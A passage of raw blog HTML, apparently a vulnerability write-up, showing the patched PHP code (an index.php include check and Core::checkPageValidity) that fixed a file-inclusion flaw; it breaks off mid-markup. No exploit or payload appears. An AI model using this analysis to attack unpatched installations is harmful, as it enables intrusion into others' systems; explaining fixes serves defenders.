1781px) 100vw, 1781px\" \/><\/a><\/p>\n<p>Let&#8217;s look at the patched code and understand how the issue was fixed.<\/p>\n<p>Index.php:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b3aa4e01a08e609268547\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> if (! empty($_REQUEST[&#8216;target&#8217;])      &amp;&amp; is_string($_REQUEST[&#8216;target&#8217;])      &amp;&amp; ! preg_match(&#8216;\/^index\/&#8217;, $_REQUEST[&#8216;target&#8217;])      &amp;&amp; ! in_array($_REQUEST[&#8216;target&#8217;], $target_blacklist)      &amp;&amp; Core::checkPageValidity($_REQUEST[&#8216;target&#8217;], [], true)  ) {      include $_REQUEST[&#8216;target&#8217;];      exit;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a08e609268547-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a08e609268547-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a08e609268547-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a08e609268547-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a08e609268547-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a08e609268547-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a08e609268547-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a08e609268547-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a08e609268547-9\">9<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a08e609268547-1\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">empty<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_REQUEST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;target&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a08e609268547-2\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">is_string<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_REQUEST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;target&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a08e609268547-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">preg_match<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;\/^index\/&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_REQUEST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;target&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a08e609268547-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">in_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_REQUEST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;target&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">target_blacklist<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a08e609268547-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Core<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">checkPageValidity<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_REQUEST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;target&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a08e609268547-6\"><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a08e609268547-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">include<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_REQUEST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;target&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a08e609268547-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">exit<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a08e609268547-9\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0012 seconds] -->  <\/p>\n<p>Core.php:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b3aa4e01a091706289721\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> public static function checkPageValidity(&amp;$page, array $whitelist = [], $include = false)      {          if (empty($whitelist)) {              $whitelist = self::$goto_whitelist;          }          if (! isset($page) || !is_string($page)) {              return false;          }            if (in_array($page, $whitelist)) {              return true;          }          if ($include) {              return false;          }            $_page = mb_substr(              $page,              0,              mb_strpos($page . &#8216;?&#8217;, &#8216;?&#8217;)          );          if (in_array($_page, $whitelist)) {              return true;          }            $_page = urldecode($page);          $_page = mb_substr(              $_page,              0,              mb_strpos($_page . &#8216;?&#8217;, &#8216;?&#8217;)          );          if (in_array($_page, $whitelist)) {              return true;          }            return false;      }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a091706289721-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a091706289721-37\">37<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-1\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">checkPageValidity<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">array<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">include<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-2\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">empty<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">goto_whitelist<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">isset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">is_string<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">in_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">include<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mb_substr<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">mb_strpos<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-i\">page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;?&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;?&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">in_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">urldecode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mb_substr<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">mb_strpos<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-i\">_page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;?&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;?&#8217;<\/span><span 